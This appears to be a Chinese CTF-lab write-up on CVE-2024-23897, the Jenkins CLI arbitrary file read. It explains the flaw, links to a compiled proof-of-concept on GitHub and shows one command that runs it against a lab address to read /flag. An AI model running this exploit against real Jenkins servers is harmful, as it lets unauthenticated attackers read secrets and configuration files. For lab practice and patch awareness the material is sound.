【春秋云境】CVE-2024-23897-Jenkins 2.441之前版本存在任意文件读取漏洞

HMX4042024-09-28 14:00

一、靶场介绍

Jenkins 2.441及更早版本,以及LTS 2.426.2及更早版本没有禁用其CLI命令解析器的一个功能,该功能会将参数中'@'字符后跟的文件路径替换为该文件的内容,允许未经身份验证的攻击者读取Jenkins控制器文件系统上的任意文件。

二、POC下载

.直接下载编译好的二进制文件
Linux:

https://github.com/wjlin0/CVE-2024-23897/releases/download/v1.0.1/CVE-2024-23897_1.0.1_linux_amd64.zip
Window:

https://github.com/wjlin0/CVE-2024-23897/releases/download/v1.0.1/CVE-2024-23897_1.0.1_windows_amd64.zip
其他系统Release:

https://github.com/wjlin0/CVE-2024-23897/releases/tag/v1.0.1

获取flag

CVE-2024-23897.exe -u http://39.106.48.123:41922/ -a /flag

相关推荐
Austindatabases20 分钟前
沧海要,《SQL SERVER 运维之道》,清风笑,竟惹寂寥
运维
ACRELKY4 小时前
光伏运维迎来云端革命!AcrelCloud-1200如何破解分布式光伏四大痛点?
运维·分布式
星期天要睡觉6 小时前
Linux 综合练习
linux·运维·服务器
saynaihe6 小时前
proxmox8升级到proxmox9
linux·运维·服务器
Delphi菜鸟7 小时前
docker 部署RustDesk服务
运维·docker·容器
Orchestrator_me7 小时前
CentOS交换区处理
linux·运维·centos
FLS1687 小时前
VMwaer虚拟机安装完Centos后无法联网问题
linux·运维·centos
OctopusMonster7 小时前
centos下gdb调试python的core文件
linux·运维·centos
wanhengidc7 小时前
云手机可以息屏挂手游吗?
运维·网络·安全·游戏·智能手机
一只小白菜~7 小时前
实战记录:H3C路由器IS-IS Level-1邻居建立与路由发布
运维·网络·计算机网络·智能路由器
热门推荐
012025 年高教社杯全国大学生数学建模竞赛C 题 NIPT 的时点选择与胎儿的异常判定 完整成品思路模型代码分享,全网首发高质量!!!022025年数学建模国赛C题超详细解题思路032025全国大学生数学建模C题保姆级思路模型(持续更新):NIPT 的时点选择与胎儿的异常判定042025高教社杯国赛数学建模选题建议+初步分析052025国赛B题保姆级教程思路分析 碳化硅外延层厚度的确定06UV安装并设置国内源07奈飞工厂官网,国内Netflix影视在线看|中文网页电脑版入口08KGG转MP3工具|非KGM文件|解密音频09(E题|AI 辅助智能体测)2025年高教杯全国大学生数学建模国赛解题思路|完整代码论文集合10不再让Windows更新!&Edge游戏助手卸载及关闭自动更新